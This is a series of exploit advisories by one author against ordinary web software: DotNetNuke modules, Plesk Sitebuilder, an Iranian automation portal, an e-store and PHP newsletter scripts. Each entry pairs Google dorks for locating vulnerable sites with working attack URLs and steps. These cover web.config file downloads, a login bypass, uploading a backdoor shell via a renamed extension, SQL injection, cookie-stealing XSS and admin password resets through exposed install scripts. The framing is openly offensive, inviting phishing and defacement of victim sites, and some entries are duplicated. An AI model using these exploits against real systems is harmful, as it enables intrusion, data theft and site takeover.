DNN(DotNetNuke�) Iconbar Control Panel Bad Access Level config
#+ # Title : DNN(DotNetNuke®) Iconbar Control Panel Bad Access Level config # Author : alieye # vendor : http://dnnsoftware.com/ # Contact : cseye...@yahoo.com # Risk : High # Class: Remote # # Google Dork: # inurl:ctl/+inurl:/tab # inurl:ctl+inurl:tab Model Modules Pages # inurl:ctl=tab Page Details Copy Page Permissions # # Version: all version # Date: 25/08/2014 # os : windows server 2008 # You can making your own attack with Vulnerable Page :) go to victim site and making with Iconbar moduels (phishing page,deface page or privilege escalation) # [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/ #
DNN(DotNetNuke�) Ribbon Bar Control Panel Bad Access Level config
#+ # Title : DNN(DotNetNuke®) Ribbon Bar Control Panel Bad Access Level config # Author : alieye # vendor : http://dnnsoftware.com/ # Contact : cseye...@yahoo.com # Risk : High # Class: Remote # # Google Dork: # inurl:ctl/+inurl:/tab # inurl:ctl+inurl:tab Model Modules Pages # inurl:ctl=tab Page Details Copy Page Permissions # # Version: all version # Date: 25/08/2014 # os : windows server 2008 # You can making your own attack with Vulnerable Page :) go to victim site and making with Ribbon Bar moduels (phishing page,deface page or privilege escalation) # [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/ #
MEHR Automation System Arbitrary File Download Vulnerability(persian portal)
#+ # Title : MEHR Automation System Arbitrary File Download Vulnerability(persian portal) # Author : alieye # vendor : http://shakhesrayane.ir/ # Contact : cseye...@yahoo.com # Risk : High # Class: Remote # # Google Dork: # intext:poshtib...@shakhesrayane.ir # intext:Shakhes Rayane Sepahan # www.google.com/search?q=%22%D8%B3%DB%8C%D8%B3%D8%AA%D9%85+%D8%A7%D8%AA%D9%88%D9%85%D8%A7%D8%B3%DB%8C%D9%88%D9%86+%D8%A7%D8%AF%D8%A7%D8%B1%DB%8C+%D9%85%D9%87%D8%B1+%D8%AF%D8%A7%D9%86%D8%B4%22 # # Version: all version # Date: 25/08/2014 # os : windows server 2008 # You can download any file from your target ;) Exploit : http://victim.com/ShowFile.aspx?File=~/web.config # [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/ #
Multiple Vulnerabilities in Parallels� Plesk Sitebuilder
#+ # Title : Multiple Vulnerabilities in Parallels® Plesk Sitebuilder # Author : alieye # vendor : http://www.parallels.com/ # Contact : cseye...@yahoo.com # Risk : High # Class: Remote # # Google Dork: # inurl::2006/Sites ext:aspx # inurl::2006 inurl:.ashx?mediaid # intext:© Copyright 2004-2007 SWsoft. ext:aspx # inurl:Wizard/HostingPreview.aspx?SiteID # # Date: 23/07/2014 # os : windows server 2003 # poc video clip : http://alieye.persiangig.com/video/plesk.rar/download # 1-bypass loginpage (all version) http://victim.com:2006/login.aspx change url path to http://victim.com:2006/wizard - 2-uploading shell via Live HTTP Headers(version 2004-2007) Tools Needed: Live HTTP Headers, Backdoor Shell Step 1: Locate upload form on logo upload section in http://victim.com:2006/Wizard/DesignLayout.aspx Step 2: Rename your shell to shell.asp.gif and start capturing data with Live HTTP Headers Step 3: Replay data with Live HTTP Headers - Step 4: Change [Content-Disposition: form-data; name=ctl00$ContentStep$FileUploadLogo; filename=shell.asp.gif\r\n] to [Content-Disposition: form-data; name=ctl00$ContentStep$FileUploadLogo; filename=shell.asp.asp\r\n] Step 5: go to shell path: http://victim.com:2006/Sites/GUID Sitename created/App_Themes/green/images/shell_asp.asp - 3-Arbitrary File Download Vulnerability(all version) You can download any file from your target http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID Sitename createdp=filename example: http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790bp=web.config - 4-xss(all version) you can inject xss code in all module of this page http://sitebuilder.cp.collaborationhost.net/Wizard/Edit.aspx goto this page (edit.aspx), click on one module (Blog-eShop-Forum-...) then goto Add New Category and insert xss code in Category description and Enjoy :) - 5-not authentication for making a website(all version) making malicious page and phishing page with these paths http://victim.com:2006/Wizard/Pages.aspx http://victim.com:2006/Wizard/Edit.aspx # [#] special members: ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir [#] Thanks To All cseye members and All Iranian Hackers [#] website : http://cseye.vcp.ir/ # [#] Spt Tnx To Master of Persian Music: Hossein Alizadeh [#] Hossein Alizadeh website : http://www.hosseinalizadeh.net/ [#] download ney-nava album : http://dnl1.tebyan.net/1388/02/2009052010245138.rar #
DNN (DotNetNuke�) ASPSlideshow Module Arbitrary File Download Vulnerability
#+ # Title : DNN (DotNetNuke®) ASPSlideshow Module Arbitrary File Download Vulnerability # Author : alieye # vendor : http://www.mediaant.com/ , http://store.dnnsoftware.com/ # Contact : cseye...@yahoo.com # Risk : High # Class: Remote # Google Dork: inurl:/DesktopModules/+inurl:/ASPSlideshow/ # Version: all version # Date: 09/06/2014 # os : windows server 2008 # You can download any file from your target ;) Exploit : http://victim.com/DesktopModules/ASPSlideShow/ASPSlideShowDownload.aspx?ID=~/web.config # [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/ #
DNN (DotNetNuke�) CodeEditor Module Arbitrary File Download Vulnerability
#+ # Title : DNN (DotNetNuke®) CodeEditor Module Arbitrary File Download Vulnerability # Author : alieye # vendor : http://www.mediaant.com/ , http://store.dnnsoftware.com/ # Contact : cseye...@yahoo.com # Risk : High # Class: Remote # Google Dork: inurl:/DNNCodeEditor/ # Version: all version # Date: 09/06/2014 # os : windows server 2008 # You can download any file from your target ;) Exploit : http://victim.com/DesktopModules/DNNCodeEditor/DNNCodeEditorDownload.aspx?ID=/web.config # [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/ #
DNN (DotNetNuke�) EasyDnnGallery Module Arbitrary File Download Vulnerability
#+ # Title : DNN (DotNetNuke®) EasyDnnGallery Module Arbitrary File Download Vulnerability # Author : alieye # vendor : http://www.easydnnsolutions.com/ , http://store.dnnsoftware.com/ # Contact : cseye...@yahoo.com # Risk : High # Class: Remote # Google Dork: inurl:/EasyDnnGallery/ # Version: all version # Date: 09/06/2014 # os : windows server 2008 # You can download any file from your target ;) Exploit : http://victim.com/DesktopModules/EasyDnnGallery/ImageDownload.aspx?file=~/web.config # [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/ #
DNN (DotNetNuke�) eventscalendar Module Arbitrary File Download Vulnerability
#+ # Title : DNN (DotNetNuke®) eventscalendar Module Arbitrary File Download Vulnerability # Author : alieye # vendor : http://www.invenmanager.com/ , http://store.dnnsoftware.com/ # Contact : cseye...@yahoo.com # Risk : High # Class: Remote # Google Dork: inurl:/desktopmodules/eventscalendar/ # Version: all version # Date: 09/06/2014 # os : windows server 2008 # You can download any file from your target ;) Exploit : http://victim.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config # [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/ #
DNN (DotNetNuke�) responsivesidebar Module Arbitrary File Download Vulnerability
#+ # Title : DNN (DotNetNuke®) responsivesidebar Module Arbitrary File Download Vulnerability # Author : alieye # vendor : http://www.mediaant.com/ , http://store.dnnsoftware.com/ # Contact : cseye...@yahoo.com # Risk : High # Class: Remote # Google Dork: inurl:/responsivesidebar/ # Version: all version # Date: 09/06/2014 # os : windows server 2008 # You can download any file from your target ;) Exploit : http://victim.com/DesktopModules/ResponsiveSidebar/ResponsiveSidebarDownload.aspx?ID=~/web.config # [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/ #
DNN (DotNetNuke�) dnnUI_NewsArticlesSlider Module Arbitrary File Download Vulnerability
#+ # Title : DNN (DotNetNuke®) dnnUI_NewsArticlesSlider Module Arbitrary File Download Vulnerability # Author : alieye # vendor : http://www.dnnui.com/ , http://store.dnnsoftware.com/ # Contact : cseye...@yahoo.com # Risk : High # Class: Remote # Google Dork: inurl:/dnnUI_NewsArticlesSlider/ # Version: all version # Date: 09/06/2014 # os : windows server 2008 # You can download any file from your target ;) Exploit : http://victim.com/DesktopModules/dnnUI_NewsArticlesSlider/ImageHandler.ashx?img=~/web.config # [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/ #
multiple Vulnerability in WahmShoppes eStore
#+ # Title : multiple Vulnerability in WahmShoppes eStore # Author : alieye # vendor : http://www.wahmshoppes.com/ # Contact : cseye...@yahoo.com # Risk : High # Class: Remote # Google Dork: # inurl:WsError.asp # inurl:store/ We apologize but your request rendered no results # Version: all version # Date: 05/06/2014 # 1-Blind SQL Injection http://victim.com/store/WsDefault.asp?One=-999 AND 1=1+UNION+SELECT+...etc - 2-Cross Site Scripting http://victim.com/store/WsError.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://victim.com/store/WsRequestpwd.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E - 3-Information Disclosure in image location http://victim.com/store/thumb.asp?path=X:/server path and domain name/example.jpg - 4-show admin panel tools http://victim.com/store/frmLeft.asp - Admin page http://victim.com/store/admin/Default.asp # [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/ #
Simple PHP Newsletter Remote Admin Password Change With install path
# Simple PHP Newsletter Remote Admin Password Change With install path # # # # Author: alieye # # # # class : remote # # # # E-mail: cseye...@yahoo.com # # # # greetz: C.S.Eye Security Team members # # # # We Are: Alieye , Z0d14c , Bully13 , Stanly , Safety All Iranian Hackers # # # # Site : www.gcmt.vcp.ir , blog : www.cseye.blogfa.com # # download : http://quirm.net/download/23/ Dork : intitle:News list Administration panel or Simple PHP Newsletter Example : 1. Go to url : target.com/newsletter/admin.php or target.com/mailer/admin.php 2. Clean admin.php and Go to target.com/newsletter/install/install1.php or target.com/mailer/install/install1.php 3. Write new password for admin and click next stage 4. finish install 5. Go to url : target.com/newsletter/admin.php or target.com/mailer/admin.php 5. Login admin with new password
Simple PHP Newsletter Remote Admin Password Change With install path
# Simple PHP Newsletter Remote Admin Password Change With install path # # # # Author: alieye # # # # class : remote # # # # E-mail: cseye...@yahoo.com # # # # greetz: C.S.Eye Security Team members # # # # We Are: Alieye , Z0d14c , Bully13 , Stanly , Safety All Iranian Hackers # # # # Site : www.gcmt.vcp.ir , blog : www.cseye.blogfa.com # # download : http://quirm.net/download/23/ Dork : intitle:News list Administration panel or Simple PHP Newsletter Example : 1. Go to url : target.com/newsletter/admin.php or target.com/mailer/admin.php 2. Clean admin.php and Go to target.com/newsletter/install/install1.php or target.com/mailer/install/install1.php 3. Write new password for admin and click next stage 4. finish install 5. Go to url : target.com/newsletter/admin.php or target.com/mailer/admin.php 5. Login admin with new password Date : 03/29/2011
WESPA PHP Newsletter v3.0 Remote Admin Password Change With install path
# WESPA PHP Newsletter v3.0 Remote Admin Password Change With install path # # # # Author: alieye # # # # class : remote # # # # E-mail: cseye...@yahoo.com # # # # greetz: C.S.Eye Security Team members # # # # We Are: Alieye , Z0d14c , Bully13 , Stanly , Safety All Iranian Hackers # # # # Site : www.gcmt.vcp.ir , blog : www.cseye.blogfa.com # # download : http://www.wespadigital.com/scripts/wespanewsletter/wespa_php_newsletter_v3.zip Dork : intitle:News list Administration panel or WESPA PHP Newsletter v3.0 Example : 1. Go to url : target.com/newsletter/admin.php 2. Clean admin.php and Go to target.com/newsletter/install/install1.php 3. Write new password for admin and click next stage 4. finish install 5. Go to url : target.com/newsletter/admin.php 5. Login admin with new password Date : 03/29/2011
WESPA PHP Newsletter v3.0 Remote Admin Password Change With install path
# WESPA PHP Newsletter v3.0 Remote Admin Password Change With install path # # # # Author: alieye # # # # class : remote # # # # E-mail: cseye...@yahoo.com # # # # greetz: C.S.Eye Security Team members # # # # We Are: Alieye , Z0d14c , Bully13 , Stanly , Safety All Iranian Hackers # # # # Site : www.gcmt.vcp.ir , blog : www.cseye.blogfa.com # # download : http://www.wespadigital.com/scripts/wespanewsletter/wespa_php_newsletter_v3.zip Dork : intitle:News list Administration panel or WESPA PHP Newsletter v3.0 Example : 1. Go to url : target.com/newsletter/admin.php 2. Clean admin.php and Go to target.com/newsletter/install/install1.php 3. Write new password for admin and click next stage 4. finish install 5. Go to url : target.com/newsletter/admin.php 5. Login admin with new password